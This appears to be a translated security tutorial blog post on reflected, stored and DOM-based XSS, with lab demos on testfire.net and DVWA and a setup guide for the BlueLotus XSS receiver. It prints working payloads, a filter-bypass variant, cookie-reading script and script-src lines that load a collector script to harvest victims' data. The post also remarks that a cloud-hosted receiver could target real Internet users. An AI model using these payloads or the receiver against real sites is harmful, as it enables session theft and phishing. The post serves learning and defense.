Protect website security: learn the installation and use of Blue Lotus, reproduce cross-site scripting attack vulnerabilities and XSS receiving platform

 This article is intended for network security learning , please do not do any illegal acts, otherwise you will bear the consequences. 

Environmental preparation

1. Basics of XSS

1. Reflected XSS

Attack introduction

principle

An attacker submits a request containing a malicious script to a target website, and then injects the malicious script into the response page, causing other users to run the malicious script when viewing the page containing the injected malicious script.

Image Source

Instructions:

1. Attackers construct URLs with malicious scripts, for example by injecting script code in URL parameters.
2. Attackers lure users to click or visit URLs containing malicious scripts in various ways, such as phishing emails, social media links, etc.
3. When a user accesses a URL containing a malicious script, the server will return the malicious script code in the URL parameter to the user's browser as part of the response page.
4. When the user's browser parses the response page, it will execute a malicious script, resulting in a successful attack.

The premise of reflected XSS is that the target website does not adequately filter and escape the data entered by the user. If the target website does not properly validate and process user input, and directly displays the content entered by the user on the response page, then the attacker can exploit this vulnerability to carry out reflected XSS attacks.

defense:

1. Input validation and filtering: Validate and filter the data entered by the user to ensure that only the expected data is received, and reject the input containing malicious scripts.
2. Output escaping: Before outputting the content entered by the user to the response page, escape special characters, such as escaping "<" to "<", escaping ">" to ">", etc., to prevent malicious scripts execution.
3. Use HTTP Only Cookies: Mark cookies as HTTP Only to prevent sensitive information from being accessed by scripts.
4. CSP (Content Security Policy): Use CSP to restrict the content that is allowed to execute on the page, including prohibiting inline scripts (such as <script>) and restricting the loading of external resources.
5. Secure coding practices: Developers should follow secure coding practices, including proper handling of user input, use of secure programming language functions and APIs, and more.

Regular security audits and vulnerability scans are also very important to ensure that potential reflected XSS vulnerabilities are discovered and patched in a timely manner.

range:

http://testfire.net   This is an open source test website, attacking this website is not illegal.

attack demo

Test whether there is reflective xss on the website

Mantra: insert as soon as you see the frame, change the url parameter

Enter any character: hello, how are you, Li Yinhe

Continue to add an html tag: <h1> hello

example

Here is an example of how a malicious script can perform a reflected XSS attack by injecting it into a request parameter:

Suppose there is a search function, users can enter keywords in the search box to search. The value of the search box is passed as a parameter to the server for processing, and relevant search results are returned.

Normally, the URL of the search function might look like this:

https://example.com/search?keyword=mysearch

An attacker can enter a malicious script as a keyword in the search box, for example:

<script>alert('XSS Attack');</script>

When a user submits a search request, the URL will look like this:

https://example.com/search?keyword=<script>alert('XSS Attack');</script>

When processing this request, the server may not strictly verify and filter the input, and directly return the malicious script in the parameter to the user, thus causing an attack. When the user's browser parses the returned content, it will execute a malicious script and pop up a warning box.

start attacking

My redirect url here is Baidu. If it is a real attack link, there is an attack script behind the link. Of course, the page of the attack script may be the login page of well-known websites such as Jingdong and Taobao, or even the login page of some colored websites. After you enter your personal privacy information to log in, the page may jump to a 404 page for you to try later. Many people may not take it seriously and think that there is a problem with the website. In fact, your personal information has long been After being collected by the attacker, don’t ask me what I know

(¬‿¬)

 <a href="https://www.baidu.com/">震惊!88岁中国老太太让全世界膜拜</a>

After the test, we can conclude that there is reflective xss on this website, which can be used by criminals

If you need to execute JS code in the input box, you need to write it in the <script> tag, such as:

<script>alert("hello,zhangsan")</script>

After the code is executed, a pop-up box will appear 

Or enter: <img src=1 οnerrοr=alert(1)> # img is the image label, src fills in the image path, write 1 path here must not exist and then report an error, error is to capture the event of the error, on is to bind Set the event to the img tag, "=" can be followed by the JS code we want to execute

Of course, the attacks I just entered into the search box, readers may feel that the principle of the reflective XSS I mentioned earlier is different from the attack method in the example. We can also directly write the attack in the url parameter of the search parameter

2. Stored XSS

Attack introduction

principle:

The attacker injects a malicious script into the database of the target website, and then other users read and execute the malicious script from the database when they visit the page containing the malicious script.

Image Source

Instructions:

1. Attackers find vulnerable entry points on the target website, such as comment boxes, message boards, etc.
2. The attacker enters malicious script code, which is stored in the target website's database.
3. When other users visit pages containing malicious scripts, the malicious scripts are read from the database and displayed.
4. When the user's browser parses the response page, it will execute a malicious script, resulting in a successful attack.

The premise of stored XSS is that the target website does not sufficiently filter and escape the data entered by the user, and directly stores the content entered by the user in the database, and then reads and displays the content on the page.

defense:

1. Input validation and filtering : Validate and filter the data entered by the user to ensure that only the expected data is received, and reject the input containing malicious scripts.
2. Output escaping : Before outputting the content entered by the user to the response page, escape special characters, such as escaping "<" to "<", escaping ">" to ">", etc., to prevent malicious scripts execution.
3. Input restrictions and whitelists : Restrict the content and format of user input, only allow expected data, and use whitelists to filter unsafe content.
4. Secure coding practices : Developers should follow secure coding practices, including proper handling of user input, use of secure programming language functions and APIs, and more.
5. Secure storage : Perform additional processing on user-input data when storing it, such as encoding, encrypting, or using a secure storage mechanism.
6. Regularly conduct security audits and vulnerability scans to ensure that potential stored XSS vulnerabilities are discovered and patched in a timely manner.

By combining the above defense measures, the risk of stored XSS attacks can be effectively reduced.

attack demo

Here I use the DVWA shooting range for testing

First, turn down the security level on the shooting range to the lowest level

Select XSS Storage

<script>alert("hello,zhangsan")</script>
<scr<script>ipt>alert("xss")</script>

After refreshing the web page, the pop-up box still pops up. (If this is a real website, then our bullet box attack will also affect other users. Although it is useless, it can be disgusting and cause other users to feel uncomfortable. After a long time, the number of users on the website will naturally decrease. It can be said that " Harmful to others")

Here, the jump tag can be written in the same way as the previous injection attack. The difference is that the stored XSS attack statement can be saved in the database of the target website. 

<a href="https://www.baidu.com/">震惊!88岁中国老太太让全世界膜拜</a>

The difference between reflected XSS and stored XSS

Reflected XSS and Stored XSS are two common types of cross-site scripting (XSS) attacks with the following differences:

Attack method:

• Reflected XSS : The attacker injects malicious scripts into URL parameters or form inputs. When a user accesses a URL containing malicious scripts or submits a form containing malicious scripts, the malicious scripts will be parsed by the server and returned to the user, resulting in an attack.
• Stored XSS : The attacker injects malicious scripts into the database or other storage media of the application. When other users visit the page containing the malicious scripts, the malicious scripts will be obtained from the server and executed, resulting in an attack.

Injection method:

• Reflected XSS : Malicious scripts are injected into the parameters of the request, the server returns the malicious scripts in the parameters to the user, and the user's browser parses and executes the script.
• Stored XSS : Malicious scripts are injected into application databases or other storage media. When other users access pages containing malicious scripts, the server obtains the malicious scripts from the storage media and returns them to the user. The user's browser parses and executes the script.

Sphere of influence:

• Reflected XSS : The scope of the attack is usually small, and the attack will only be triggered when the user visits the URL containing the malicious script.
• Stored XSS : The impact of the attack is large. Once the malicious script is stored on the server, all users who visit the page containing the malicious script will be attacked.

Defensive measures:

• Reflected XSS : Attacks can be prevented through input verification and output encoding, strict filtering and verification of user input, escaping or encoding of special characters, to ensure that user input will not be parsed as malicious scripts.
• Stored XSS : Attacks can be prevented through input verification, output encoding and secure storage, strict filtering and verification of user input, escaping or encoding of special characters, and storing user input data in a secure manner , such as using prepared statements or stored procedures.

In general, reflected XSS and stored XSS are different forms of XSS attacks, but their attack methods, injection methods and defense measures are different. Developers should take comprehensive security measures to prevent XSS attacks, including input validation, output encoding, and secure storage.

3. DOM type XSS

Attack introduction

        DOM-type XSS is an attack method that injects and executes malicious scripts by modifying the DOM structure of a web page. Attackers take advantage of the loopholes in the front-end JavaScript code and tamper with the attributes or event handlers of DOM elements to make the browser execute malicious scripts when parsing the page. This type of attack usually occurs on the browser side and has no direct impact on the server .

principle:

1. The attacker finds vulnerable JavaScript code in the target web page.
2. Attackers modify properties or event handlers of DOM elements with malicious input.
3. When the user opens the tampered page in the browser, the browser will parse the DOM structure and execute the malicious script, resulting in the success of the attack.

Image Source 

Instructions:

1. The attacker identifies vulnerable JavaScript code in the target web page.
2. The attacker constructs specific malicious input, and injects malicious scripts into the target webpage by modifying the attributes of DOM elements or event handlers.
3. Malicious scripts are executed when a user visits a tampered page.

Prerequisites: The premise of using DOM-type XSS is that there are DOM elements in the target webpage that can be controlled or modified by the attacker, usually due to vulnerabilities in the front-end JavaScript code.

Defense method:

1. Input validation and filtering: Validate and filter the data entered by the user to ensure that only the expected data is received, and reject the input containing malicious scripts.
2. Output escaping: When outputting the content entered by the user to the page, escape special characters to avoid the execution of malicious scripts.
3. Secure Coding Practices: Developers should write secure JavaScript code to avoid vulnerabilities in DOM manipulation and event handlers.
4. Content Security Policy (Content Security Policy, CSP): Use CSP to set a whitelist to limit the resources that are allowed to be loaded and the scripts to be executed to reduce the attack surface.
5. Regularly conduct security audits and vulnerability scans to discover and fix potential DOM-type XSS vulnerabilities in a timely manner.

attack demo

Start the test. The DOM structure of the original drop-down list is as follows: (F12 can open the developer mode and view the structure code of the web page)

 Detect whether there is an XSS DOM vulnerability in the website

<script>alert("test")</script>

Steal cookies from websites 

<script>alert(document.cookie)</script>

2. Advanced XSS

I believe that through the above explanations, everyone has a general idea of ​​XSS. Let me introduce the XSS receiving platform Blue Lotus. There is a song also sung by this name Xu Wei, which is very nice.

Download: GitHub - firesunCN/BlueLotus_XSSReceiver

Install

1. I installed it on the local Phpstudy. There is nothing to say. The installation process is the next step (you can change the installation path), and the download link is attached:

# 官网：https://www.xp.cn/download.html
# PhpStudy2018
http://public.xp.cn/upgrades/PhpStudy2018.zip

# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver

It is recommended to download the 2018 version for easy operation

Start the service after the installation is complete

Place the decompressed BlueLotus_XSSReceiver original code in the WWW folder of the phpstudy installation directory

 Then enter in the browser: http://local ip/BlueLotus_XSSReceiver-master # Access the BlueLotus_XSSReceiver file we just pulled to the www folder and enter the installation interface

2. Configure the XSS receiving platform -  Blue Lotus

insert template

Fill in the url of the received data, the format: the url of the current Blue Lotus platform + the file name (the file name is chosen by yourself)

example

Finally choose to generate paraload

have a test

3. Copy and save the attack statement for later use

<script src="http://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js"></script>

4. Attack demo

local demo

Suddenly thought of a problem, the IP in the attack statement I just made is the local loopback address, so if I test the attack in the shooting range of the virtual machine, then my Blue Lotus platform cannot receive it, so here is the local loopback address first. Shooting range test, I will demonstrate it in a virtual machine later (if the Blue Lotus platform is deployed on a cloud server, it can attack other Internet users)

Remove the character limit of the input box

Go back to the platform to view the attack

Click to view email information 

virtual machine demo

ipconfig    # 查看本机ip

Use the local IP to access the Blue Lotus platform and test it

Restructure the attack payload

<script src="http://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js"></script>

back to platform

That's all for this post, feel free to read!